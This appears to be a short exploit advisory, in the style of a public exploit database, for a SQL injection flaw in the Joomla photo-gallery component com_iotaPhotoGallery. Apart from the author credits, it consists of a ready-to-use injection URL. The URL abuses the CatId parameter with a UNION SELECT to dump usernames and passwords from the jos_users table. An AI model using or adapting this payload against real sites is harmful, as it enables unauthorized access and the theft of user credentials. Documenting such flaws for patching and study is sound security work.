/*

Name : Joomla Component com_iotaPhotoGallery
Vuln : SQL Injection vulnerability

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com

Greetz : Zuka , Grey Hat Hackers

*/

# SQLI

[HOST]/[PATH]/index.php?option=com_iotaPhotoGallery&task=ImageDetails&CatId=-5+union+select+1,2,3,concat_ws(0x3a,username,password),5+from+jos_users--